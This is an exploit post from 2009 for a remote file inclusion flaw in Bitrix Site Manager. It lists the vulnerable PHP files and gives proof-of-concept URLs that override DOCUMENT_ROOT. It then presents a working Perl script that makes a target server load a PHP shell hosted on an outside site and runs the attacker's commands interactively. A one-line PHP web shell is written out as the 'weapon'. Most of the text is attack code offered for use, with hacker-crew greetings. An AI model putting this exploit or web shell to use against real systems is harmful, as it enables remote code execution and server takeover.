#####
# [+] Author  : Don Tukulesto (root@indonesiancoder.com)
# [+] Date   : November 13, 2009
# [+] Homepage  : http://www.indonesiancoder.com
# [+] Vendor   : http://www.bitrixsoft.com/
# [+] Method  : Remote File Inclusion
# [+] Location   : INDONESIA
# [~] Notes  : I know this is an old bugs, but i just write this exploit under perl module.
# [~] Refrence  : http://www.securityfocus.com/bid/13965
# [~] How To  :
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
<!--more-->
# [-] Bugs in

[+] rss.php
<pre lang="php">
<?
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/iblock/rss.php");
?> 
</pre>

[+] redirect.php
<pre lang="php">
<?
define("GENERATE_EVENT","Y");
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
if (CModule::IncludeModule("statistic"))
{
    $goto = eregi_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto);
}
else
{
    $goto = eregi_replace("#EVENT_GID#","",$goto);
}
LocalRedirect($goto);
?> 
</pre>

[+] click.php
<pre lang="php">
<?
define("GENERATE_EVENT","Y");
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
if (intval($id)>0 and CModule::IncludeModule("advertising")) CAdvBanner::Click($id);
if (CModule::IncludeModule("statistic")) $goto = str_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto);
LocalRedirect($goto);
?>
</pre>

[+] admin/index.php
<pre lang="php">
<?
require_once(dirname(__FILE__)."/../modules/main/include/prolog_admin_before.php");
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php");
?>
<?
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/index.php");
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php");
?>
</pre>

[+] tools/help.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help.php");?> 
</pre>

[+] tools/calendar.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/calendar.php");?> 
</pre>

[+] tools/ticket_show_file.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/support/admin/ticket_show_file.php");?> 
</pre>

[+] tools/imagepg.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/imagepg.php");?> 
</pre>

[+] tools/help_view.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_view.php");?> 
</pre>

[+] tools/help_create.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_create.php");?> 
</pre>

[-] PoC

http://127.0.0.1/BX_ROOT/rss.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/click.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/redirect.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/admin/index.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/help_create.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/help_view.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/imagepg.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/ticket_show_file.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/calendar.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/help.php?_SERVER[DOCUMENT_ROOT]=

[-] eXpL0!t c0des

<pre lang="perl">
#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;
$RoNz = $ARGV[0];
$Pathloader = $ARGV[1];
$Contrex = $ARGV[2];
if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()}
head();
sub head()
 {
 print "[o]============================================================================[o]\r\n";
 print " |    Bitrix Site Manager Multiple Remote File Include Vulnerability  |\r\n";
 print "[o]============================================================================[o]\r\n";
 }
while()
{
      print "[w00t] \$";
while(<STDIN>)
      {
              $kaMtiEz=$_;
              chomp($kaMtiEz);
$arianom = LWP::UserAgent->new() or die;
$tiw0L = HTTP::Request->new(GET =>$RoNz.'admin/index.php?_SERVER[DOCUMENT_ROOT]='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n";
$abah_benu = $arianom->request($tiw0L);
$tukulesto = $abah_benu->content;
$tukulesto =~ tr/[\n]/[Í]/;
if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";}
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)
      {print "\nCann't Connect to cmd Host or Invalid Command\n";exit}
elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($tukulesto =~ /(.*)/)
{
      $finreturn = $1;
      $finreturn=~ tr/[Í]/[\n]/;
      print "\r\n$finreturn\n\r";
      last;
}
else {print "[w00t] \$";}}}last;
sub usage()
 {
 head();
 print " | Usage:  perl tux.pl <target> <weapon url> <cmd>        |\r\n";
 print " | <Site> - Full path to execute ex: http://127.0.0.1/path/      |\r\n";
 print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt  |\r\n";
 print " | <cmd> - Command variable used in php shell          |\r\n";
 print "[o]============================================================================[o]\r\n";
 print " |   IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org    |\r\n";
 print " |   kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S      |\r\n";
 print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n";
 print " |  Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint   |\r\n";
 print " |    Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n";
 print "[o]============================================================================[o]\r\n";
 print " |  http://www.IndonesianCoder.org     |  http://www.AntiSecRadio.fm   |\r\n";
 print "[o]============================================================================[o]\r\n";
 exit();
 }
</pre>